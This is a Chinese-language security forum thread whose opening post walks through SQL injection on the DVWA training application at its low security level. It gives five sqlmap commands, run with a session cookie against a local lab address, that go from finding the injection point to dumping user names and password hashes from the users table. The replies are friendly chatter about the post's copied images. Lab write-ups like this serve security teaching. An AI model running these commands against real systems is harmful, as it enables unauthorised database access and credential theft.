搜索
    Hi~登录注册
    查看: 134|回复: 6
    收起左侧

    DVWA 之low级别sql注入

    [复制链接]

    7

    主题

    0

    精华

    123 小时

    在线时间

    密圈

    积分
    45
    发表于 2019-7-13 02:44:18 | 显示全部楼层 |阅读模式
    将Security level设为low,在左侧列表中选择“SQL Injection”,然后在右侧的“User ID”文本框中输入不同的数字就会显示相应的用户信息。

    我们首先需要判断这里所传输的参数是文本型还是数字型,分别输入3和1+2,观察它们显示的结果并不一致,因而就判断出参数类型是文本型

    接下来用sqlmap注入 ,比较简单,不过要抓包抓cookie,因为这个是登陆后的注入,不然报错重定向



    1   用sqlmap判断是否有注入点

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5"



    表示有注入点

    2.  爆数据库名

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --dbs


    3.  爆数据库的表

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --tables -D "dvwa"





    4  爆数据库表的字段

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --columns -D "dvwa" -T "users"




    5.爆账号密码

    sqlmap -u "http://192.168.242.1/dvw/vulnerabilities/sqli/?id=2&Submit=Submit#" --cookie="security=low; PHPSESSID=svb0idqkd55tee4mbckj3ejht5" --dump -D "dvwa" -T "users" -C "user,password"





    上一篇:ms12-020复现-xp蓝屏
    下一篇:【CTF-PWN】pwn4-level0
    回复

    使用道具 举报

    53

    主题

    1

    精华

    19 小时

    在线时间

    金牌会员

    Rank: 6Rank: 6

    积分
    1098
    发表于 2019-7-13 09:31:06 | 显示全部楼层
    表哥,帖子直接从别人那里复制过来的.....
    连图片链接都不改的。
    回复 支持 反对

    使用道具 举报

    7

    主题

    0

    精华

    123 小时

    在线时间

    密圈

    积分
    45
     楼主| 发表于 2019-7-13 10:44:17 | 显示全部楼层
    死咣咣 发表于 2019-7-13 09:31 AM
    表哥,帖子直接从别人那里复制过来的.....
    连图片链接都不改的。

    哦?这个吗https://www.cnblogs.com/lanyincao/p/11179134.html
    这个是我的博客
    回复 支持 反对

    使用道具 举报

    53

    主题

    1

    精华

    19 小时

    在线时间

    金牌会员

    Rank: 6Rank: 6

    积分
    1098
    发表于 2019-7-13 11:07:14 | 显示全部楼层
    lanyinhua 发表于 2019-7-13 10:44 AM
    哦?这个吗https://www.cnblogs.com/lanyincao/p/11179134.html
    这个是我的博客

    是的哇,我看图片因为防盗链加载不出来。
    来提醒表哥一下。
    回复 支持 反对

    使用道具 举报

    15

    主题

    0

    精华

    14 小时

    在线时间

    密圈

    积分
    13
    发表于 2019-7-13 11:10:10 | 显示全部楼层
    又发现新的大佬了
    回复 支持 反对

    使用道具 举报

    7

    主题

    0

    精华

    123 小时

    在线时间

    密圈

    积分
    45
     楼主| 发表于 2019-7-13 11:45:53 | 显示全部楼层
    死咣咣 发表于 2019-7-13 11:07 AM
    是的哇,我看图片因为防盗链加载不出来。
    来提醒表哥一下。

    抱歉啊,我应该先发表在我们极安都,完了有这个防盗链,谢谢提醒啊,我下次记得了
    回复 支持 反对

    使用道具 举报

    7

    主题

    0

    精华

    123 小时

    在线时间

    密圈

    积分
    45
     楼主| 发表于 2019-7-13 11:46:13 | 显示全部楼层
    陆工SU蒋 发表于 2019-7-13 11:10 AM
    又发现新的大佬了

    没有啦,小白一名
    回复 支持 反对

    使用道具 举报

    游客
    回复
    您需要登录后才可以回帖 登录 | 获取账号

    快速回复 返回顶部 返回列表